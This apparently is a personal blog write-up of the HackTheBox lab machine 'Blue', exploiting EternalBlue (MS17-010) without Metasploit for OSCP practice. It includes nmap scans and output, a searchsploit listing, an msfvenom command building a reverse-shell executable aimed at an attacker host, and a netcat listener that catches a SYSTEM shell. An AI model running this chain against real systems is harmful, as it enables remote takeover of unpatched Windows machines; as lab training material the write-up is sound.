Posts HackTheBox - Blue

HackTheBox - Blue

Blue is the third hackthebox machine i have completed but is the first time without using metasploit. This machine exploits SMB using the famous SMB MS17-010 vulnerability Eternal Blue.


  • Port Scan using Nmap
  • Searchsploit MS17-010 non-metasploit exploits
  • msfvenom to create a non-meterpreter shell.
  • netcat listener

Machine IP:

Recon and Information Gathering

Port Scan with Nmap

As always, we first begin with a simple nmap port scan to discover any open ports on this machine.

nmap -n -sV -p- -T 5 -Pn

135/tcp   open     msrpc        Microsoft Windows RPC
139/tcp   open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open     msrpc        Microsoft Windows RPC
49153/tcp open     msrpc        Microsoft Windows RPC
49154/tcp open     msrpc        Microsoft Windows RPC
49155/tcp open     msrpc        Microsoft Windows RPC
49156/tcp open     msrpc        Microsoft Windows RPC
49157/tcp open     msrpc        Microsoft Windows RPC
52097/tcp filtered unknown

we can see ports 135, 139 and 445 are open. As well as 6 ports for msrpc.


As we have SMB on port 445, lets enumerate further.

nmap -n -A -p 445 -T 5 -Pn

445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -13m39s, deviation: 34m35s, median: 6m17s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-09-14T21:54:17+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-09-14T20:54:16
|_  start_date: 2020-09-14T20:16:58

Knowing this could be exploitable, lets run Nmaps SMB vulnerability scanner against the port 445.

nmap --script=*vuln-smb* -p 445

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).

This machine is vulnerable to Eternal Blue, which means remote code execution!

Exploiting without Metasploit

Lets use searchsploit to find find a non-metasploit exploit in the database.

searchsploit --id MS17-010

kali@kali:~$ searchsploit --id ms17-010
------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                    |  EDB-ID
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (M | 43970
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                     | 41891
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                  | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)              | 42315
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                        | 42030
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                     | 41987
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

The machine is running Windows 7, so lets go ahead and use #42315 by cloning it to our working directory using searchsploit -m 42315 and then examining the source code.

The source code requires three things:

  1. Download
  2. Using MSFVenom to generate a reverse shell payload. This is indicated by:
     Note: there are many methods to get shell over SMB admin session. a simple method to get shell (but easily to be detected by AV) is executing binary generated by "msfvenom -f exe-service ..."`
  3. If possible, provide login credentials and point to the msfvenom payload.


First thing to do is clone the github repositoryand then rename it:

wget mv

Next, create the msfvenom reverse shell executable payload.

msfvenom -p windows/shell_reverse_tcp -f exe LHOST= LPORT=4444 > eternal-blue.exe

Lastly, as seen in our Nmap scan earlier, SMB supports the user ‘guest’, so enter the guest credentials into the exploit


Also we’ll add the executable’s location to the exploit file to send it and execute it.

And lastly, I will set up a netcat listener on my host machine.

nc -nvlp 4444


Run the python script python and check the netcat listener.


We have shell with system access!





End Notes

I did have some issues when exploiting this machine, but this was due to my own silly errors, such as missing out an ‘ in service_exec() and putting the file location as /root/.

This is the first machine i have completed without using metasploit, due to the OSCP not allowing it, likewise msfvenom was used due to meterpretor not being allowed either.

This post is licensed under CC BY 4.0 by the author.